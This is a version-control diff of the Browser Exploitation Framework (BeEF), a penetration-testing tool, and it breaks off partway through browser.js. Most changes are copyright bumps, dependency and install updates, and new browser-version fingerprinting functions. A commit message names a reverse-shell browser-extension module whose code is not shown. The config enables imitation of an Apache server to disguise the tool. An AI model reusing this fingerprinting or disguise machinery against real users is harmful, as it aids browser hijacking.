Fix indentation

Add malicious FF extension (reverse shell) module
trivial edits for consistency
2014-01-28 20:54:57 +10:30 · 2014-01-27 08:30:37 +10:30 · 2014-01-27 07:29:00 +10:30 · 2014-01-27 07:21:44 +10:30 · 2014-01-19 11:02:13 -08:00 · 2014-01-19 19:58:14 +01:00
997 changed files with 15365 additions and 1949 deletions
--- a/26
+++ b/26
@@ -1,23 +1,26 @@
 # BeEF's Gemfile
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-# Gems only required on Windows, or with specific Windows issues
+gem "eventmachine", "1.0.3"
 if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
  gem "win32console"
  gem "eventmachine", "1.0.0.beta.4.1"
 else
  gem "eventmachine", "0.12.10"
 end
 gem "thin"
-gem "sinatra", "1.3.2"
+gem "sinatra", "1.4.2"
 gem "rack", "1.5.2"
 gem "em-websocket", "~> 0.3.6"
-gem "jsmin", "~> 1.0.1"
+gem "uglifier", "~> 2.2.1"
 if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
  # make sure you install this gem following https://github.com/hiranpeiris/therubyracer_for_windows
  gem "therubyracer", "~> 0.11.0beta1"
  gem "execjs"
  gem "win32console"
 elsif !RUBY_PLATFORM.downcase.include?("darwin")
  gem "therubyracer"
  gem "execjs"
 end
 gem "ansi"
 gem "term-ansicolor", :require => "term/ansicolor"
 gem "dm-core"
@@ -28,6 +31,7 @@ gem "parseconfig"
 gem "erubis"
 gem "dm-migrations"
 gem "msfrpc-client"
 gem "rubyzip", "~> 1.0.0"
 # notifications
 gem "twitter"
--- a/INSTALL.txt
+++ b/INSTALL.txt
@@ -1,6 +1,6 @@
 ===============================================================================
-    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission
@@ -26,11 +26,14 @@ Installation
   2. Prerequisites (Windows)
      !!! This must be done PRIOR to running the bundle install command !!!
      Windows requires the sqlite.dll.  Simply grab the zip file below and extract it to your Ruby bin directory:
 	  http://www.sqlite.org/sqlitedll-3_7_0_1.zip
-      
+
 	  Other than that, you also need TheRubyRacer. As it's painful to install it on Windows, you can download 2 pre-compiled V8 DLLs and 2 gems from https://github.com/hiranpeiris/therubyracer_for_windows.
   3. Prerequisites (Linux)
@@ -40,8 +43,8 @@ Installation
      3.0. sudo apt-get install libsqlite3-dev sqlite3 sqlite3-doc
      3.1. install rvm from rvm.beginrescueend.com, this takes care of the various incompatable and conflicting ruby packages that are required
-      3.2. rvm install 1.9.2
+      3.2. rvm install 1.9.3-p484
-      3.3. rvm use 1.9.2
+      3.3. rvm use 1.9.3
   4. Prerequisites (Mac OSX)
@@ -50,15 +53,15 @@ Installation
      - Ruby 1.9
      	To install RVM and Ruby 1.9.3 on Mac OS:  
      	$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile 
-      	$ rvm install 1.9.3-p0 --with-gcc=clang
+      	$ rvm install 1.9.3-p484
 		$ rvm use 1.9.3
   5. Install instructions
-      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/zipball/master or cloning the GIT repo git@github.com:beefproject/beef.git
+      Obtain application code either by downloading an archive from https://github.com/beefproject/beef/archive/master.zip or cloning the GIT repo https://github.com/beefproject/beef.git
-	  Navigate to the ruby source directory and run:
+	  Enter into the newly created BeEF directory, and type:
 	  bundle install
@@ -68,4 +71,4 @@ Installation
      Simply run:
-      ./beef
+      ./beef -x
--- a/24
+++ b/24
@@ -1,6 +1,6 @@
 ===============================================================================
-    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission
@@ -35,24 +35,9 @@ Requirements
 ------------
 * OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+* [Ruby](http://rubylang.org) 1.9.2 or higher
 * [SQLite](http://sqlite.org) 3.x
-* The following GEMS: 
+* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
   - bundler 
   - thin
   - Sinatra 
   - ANSI 
   - TERM-ANSIcolor 
   - dm-core 
   - json 
   - data_objects 
   - dm-sqlite-adapter 
   - parseconfig 
   - erubis 
   - dm-migrations 
   - msfrpc-client 
   - eventmachine
   - win32console (Windows Only)
 Quick Start
@@ -60,7 +45,8 @@ Quick Start
 __The following is for the impatient.__ 
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
 We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
--- a/README.mkd
+++ b/README.mkd
@@ -1,6 +1,6 @@
 ===============================================================================
-    Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission
@@ -35,24 +35,9 @@ Requirements
 ------------
 * OSX 10.5.0 or higher, Modern Linux, Windows XP or higher
-* [Ruby](http://rubylang.org) 1.9.2 RVM or higher
+* [Ruby](http://rubylang.org) 1.9.2 or higher
 * [SQLite](http://sqlite.org) 3.x
-* The following GEMS: 
+* The gems listed in the Gemfile: https://github.com/beefproject/beef/blob/master/Gemfile
   - bundler 
   - thin
   - Sinatra 
   - ANSI 
   - TERM-ANSIcolor 
   - dm-core 
   - json 
   - data_objects 
   - dm-sqlite-adapter 
   - parseconfig 
   - erubis 
   - dm-migrations 
   - msfrpc-client 
   - eventmachine
   - win32console (Windows Only)
 Quick Start
@@ -60,7 +45,8 @@ Quick Start
 __The following is for the impatient.__ 
-For full installation details (including on Microsoft Windows), please refer to INSTALL.txt. 
+For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
 We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation
       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
@@ -72,3 +58,6 @@ To get started, simply execute beef and follow the instructions:
       $ ./beef
 On windows use
      $ ruby beef
--- a/8
+++ b/8
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -76,10 +76,10 @@ end
@beef_process_id = nil;
 task :beef_start => 'beef' do
-  printf "Starting BeEF (wait 10 seconds)..."
+  printf "Starting BeEF (wait a few seconds)..."
  @beef_process_id = IO.popen("ruby ./beef -x 2> /dev/null", "w+")
-  delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05]
+  delays = [3, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
-  delays.each do |i| # delay for 10 seconds
+  delays.each do |i| # delay for a few seconds
    printf '.'
    sleep (i)
  end
--- a/4
+++ b/4
@@ -1,7 +1,7 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-0.4.4.3-alpha
+0.4.4.9-alpha
--- a/3
+++ b/3
@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -75,6 +75,7 @@ case config.get("beef.database.driver")
    DataMapper.setup(:default,
                     :adapter => config.get("beef.database.driver"),
                     :host => config.get("beef.database.db_host"),
                     :port => config.get("beef.database.db_port"),
                     :username => config.get("beef.database.db_user"),
                     :password => config.get("beef.database.db_passwd"),
                     :database => config.get("beef.database.db_name"),
--- a/config.yaml
+++ b/config.yaml
@@ -1,13 +1,16 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file
 beef:
-    version: '0.4.4.3-alpha'
+    version: '0.4.4.9-alpha'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
    client_debug: false
    restrictions:
        # subnet of browser ip addresses that can hook to the framework
@@ -27,30 +30,38 @@ beef:
        # if running behind a nat set the public ip address here
        #public: ""
        #public_port: "" # port setting is experimental
-        dns: "localhost"
+        # DNS
-        panel_path: "/ui/panel"
+        dns_host: "localhost"
        dns_port: 53
        web_ui_basepath: "/ui"
        hook_file: "/hook.js"
        hook_session_name: "BEEFHOOK"
        session_cookie_name: "BEEFSESSION"
        # Allow one or multiple domains to access the RESTful API using CORS
        # For multiple domains use: "http://browserhacker.com, http://domain2.com"
        restful_api:
            allow_cors: false
            cors_allowed_domains: "http://browserhacker.com"
        # Prefer WebSockets over XHR-polling when possible.
        websocket:
          enable: false
-          secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
+          secure: true # use 'WebSocketSecure' works only on HTTPS domains and with HTTPS support enabled in BeEF
          port: 61985 # WS: good success rate through proxies
          secure_port: 61986 # WSSecure
          ws_poll_timeout: 1000 # poll BeEF every second
        # Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
        web_server_imitation:
-            enable: false
+            enable: true
            type: "apache" #supported: apache, iis
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
            # In production environments, be sure to use a valid certificate signed for the value
-            # used in beef.http.dns (the domain name of the server where you run BeEF)
+            # used in beef.http.dns_host (the domain name of the server where you run BeEF)
            key: "beef_key.pem"
            cert: "beef_cert.pem"
@@ -72,6 +83,7 @@ beef:
        # db connection information is only used for mysql/postgres
        db_host: "localhost"
        db_port: 5432
        db_name: "beef"
        db_user: "beef"
        db_passwd: "beef123"
--- a/core/api.rb
+++ b/core/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -155,7 +155,7 @@ module BeEF
                if not result == nil
                  data << {:api_id => mod[:id], :data => result}
                end
-              rescue Exception => e
+              rescue => e
                print_error "API Fire Error: #{e.message} in #{mod.to_s}.#{method.to_s}()"
              end
            end
--- a/core/api/extension.rb
+++ b/core/api/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/extensions.rb
+++ b/core/api/extensions.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/configuration.rb
+++ b/core/api/main/configuration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/migration.rb
+++ b/core/api/main/migration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/network_stack/assethandler.rb
+++ b/core/api/main/network_stack/assethandler.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/server.rb
+++ b/core/api/main/server.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/server/hook.rb
+++ b/core/api/main/server/hook.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/module.rb
+++ b/core/api/module.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/modules.rb
+++ b/core/api/modules.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/bootstrap.rb
+++ b/core/bootstrap.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -45,6 +45,7 @@ require 'core/main/rest/handlers/modules'
 require 'core/main/rest/handlers/categories'
 require 'core/main/rest/handlers/logs'
 require 'core/main/rest/handlers/admin'
 require 'core/main/rest/handlers/server'
 require 'core/main/rest/api'
 ## @note Include Websocket
--- a/core/core.rb
+++ b/core/core.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -37,4 +37,7 @@ require 'core/main/migration'
 require 'core/main/console/commandline'
 require 'core/main/console/banners'
 # @note Include rubyzip lib
 require 'zip'
--- a/core/extension.rb
+++ b/core/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/extensions.rb
+++ b/core/extensions.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/filters.rb
+++ b/core/filters.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/filters/base.rb
+++ b/core/filters/base.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/filters/browser.rb
+++ b/core/filters/browser.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -22,7 +22,7 @@ module Filters
  def self.is_valid_browsertype?(str)
    return false if not is_non_empty_string?(str)
    return false if str.length < 10
-    return false if str.length > 50
+    return false if str.length > 250
    return false if has_non_printable_char?(str)
    true
  end
@@ -123,9 +123,9 @@ module Filters
    return true if not is_non_empty_string?(str)
    return false if str.length > 1000
    if RUBY_VERSION >= "1.9" && str.encoding === Encoding.find('UTF-8')
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/u).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/u).nil?
    else
-      return (str =~ /[^\w\d\s()-.,;_!\302\256]/n).nil?
+      return (str =~ /[^\w\d\s()-.,';_!\302\256]/n).nil?
    end
  end
--- a/core/filters/command.rb
+++ b/core/filters/command.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/filters/http.rb
+++ b/core/filters/http.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/filters/page.rb
+++ b/core/filters/page.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/hbmanager.rb
+++ b/core/hbmanager.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/loader.rb
+++ b/core/loader.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/main/client/are.js
+++ b/core/main/client/are.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
--- a/core/main/client/beef.js
+++ b/core/main/client/beef.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -31,7 +31,21 @@ if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
 		// An array containing all the BeEF JS components.
 		components: new Array(),
-		
+
                /**
                 * Adds a function to display debug messages (wraps console.log())
                 * @param: {string} the debug string to return
                 */
                debug: function(msg) {
                    if (!<%= @client_debug %>) return;
                    if (typeof console == "object" && typeof console.log == "function") {
                        console.log(msg);
                    } else {
                        // TODO: maybe add a callback to BeEF server for debugging purposes
                        //window.alert(msg);
                    }
                },
 		/**
 		 * Adds a function to execute.
 		 * @param: {Function} the function to execute.
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -1,5 +1,5 @@
 //
-// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
 // Browser Exploitation Framework (BeEF) - http://beefproject.com
 // See the file 'doc/COPYING' for copying permission
 //
@@ -19,6 +19,22 @@ beef.browser = {
        return navigator.userAgent;
    },
    /**
     * Returns true if Avant Browser.
     * @example: beef.browser.isA()
     */
    isA:function () {
        return window.navigator.userAgent.match(/Avant TriCore/) != null;
    },
    /**
     * Returns true if Iceweasel.
     * @example: beef.browser.isI()
     */
    isI:function () {
        return window.navigator.userAgent.match(/Iceweasel\/\d+\.\d/) != null;
    },
    /**
     * Returns true if IE6.
     * @example: beef.browser.isIE6()
@@ -236,12 +252,68 @@ beef.browser = {
 		return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && window.navigator.userAgent.match(/Firefox\/20\./) != null;
 	},
    /**
     * Returns true if FF21
     * @example: beef.browser.isFF21()
     */
    isFF21:function () {
        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/21\./) != null;
    },
    /**
     * Returns true if FF22
     * @example: beef.browser.isFF22()
     */
    isFF22:function () {
        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/22\./) != null;
    },
    /**
     * Returns true if FF23
     * @example: beef.browser.isFF23()
     */
    isFF23:function () {
        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/23\./) != null;
    },
    /**
     * Returns true if FF24
     * @example: beef.browser.isFF24()
     */
    isFF24:function () {
        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/24\./) != null;
    },
    /**
     * Returns true if FF25
     * @example: beef.browser.isFF25()
     */
    isFF25:function () {
        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/25\./) != null;
    },
    /**
     * Returns true if FF26
     * @example: beef.browser.isFF26()
     */
    isFF26:function () {
        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && window.navigator.userAgent.match(/Firefox\/26./) != null;
    },
    /**
     * Returns true if FF27
     * @example: beef.browser.isFF27()
     */
    isFF27:function () {
        return !!window.devicePixelRatio && !!window.history.replaceState && typeof navigator.mozGetUserMedia != "undefined" && (typeof window.crypto != "undefined" && typeof window.crypto.getRandomValues != "undefined") && typeof Math.hypot == 'function' && window.navigator.userAgent.match(/Firefox\/27./) != null;
    },
    /**
     * Returns true if FF.
     * @example: beef.browser.isFF()
     */
    isFF:function () {
-        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20();
+        return this.isFF2() || this.isFF3() || this.isFF3_5() || this.isFF3_6() || this.isFF4() || this.isFF5() || this.isFF6() || this.isFF7() || this.isFF8() || this.isFF9() || this.isFF10() || this.isFF11() || this.isFF12() || this.isFF13() || this.isFF14() || this.isFF15() || this.isFF16() || this.isFF17() || this.isFF18() || this.isFF19() || this.isFF20() || this.isFF21() || this.isFF22() || this.isFF23() || this.isFF24() || this.isFF25() || this.isFF26() || this.isFF27();
    },
    /**
@@ -396,6 +468,14 @@ beef.browser = {
        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 19) ? true : false);
    },
    /**
     * Returns true if Chrome for iOS 19.
     * @example: beef.browser.isC19iOS()
     */
    isC19iOS:function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 19) ? true : false);
    },
    /**
     * Returns true if Chrome 20.
     * @example: beef.browser.isC20()
@@ -404,6 +484,14 @@ beef.browser = {
        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 20) ? true : false);
    },
    /**
     * Returns true if Chrome for iOS 20.
     * @example: beef.browser.isC20iOS()
     */
    isC20iOS:function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 20) ? true : false);
    },
    /**
     * Returns true if Chrome 21.
     * @example: beef.browser.isC21()
@@ -412,6 +500,14 @@ beef.browser = {
        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 21) ? true : false);
    },
    /**
     * Returns true if Chrome for iOS 21.
     * @example: beef.browser.isC21iOS()
     */
    isC21iOS:function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 21) ? true : false);
    },
    /**
     * Returns true if Chrome 22.
     * @example: beef.browser.isC22()
@@ -420,6 +516,14 @@ beef.browser = {
        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 22) ? true : false);
    },
    /**
     * Returns true if Chrome for iOS 22.
     * @example: beef.browser.isC22iOS()
     */
    isC22iOS:function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 22) ? true : false);
    },
    /**
     * Returns true if Chrome 23.
     * @example: beef.browser.isC23()
@@ -428,6 +532,14 @@ beef.browser = {
        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 23) ? true : false);
    },
    /**
     * Returns true if Chrome for iOS 23.
     * @example: beef.browser.isC23iOS()
     */
    isC23iOS:function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 23) ? true : false);
    },
    /**
     * Returns true if Chrome 24.
     * @example: beef.browser.isC24()
@@ -436,6 +548,14 @@ beef.browser = {
        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 24) ? true : false);
    },
    /**
     * Returns true if Chrome for iOS 24.
     * @example: beef.browser.isC24iOS()
     */
    isC24iOS:function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 24) ? true : false);
    },
    /**
     * Returns true if Chrome 25.
     * @example: beef.browser.isC25()
@@ -444,12 +564,116 @@ beef.browser = {
        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
    },
    /**
     * Returns true if Chrome for iOS 25.
     * @example: beef.browser.isC25iOS()
     */
    isC25iOS:function () {
        return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 25) ? true : false);
    },
    /**
     * Returns true if Chrome 26.
     * @example: beef.browser.isC26()
     */
    isC26:function () {
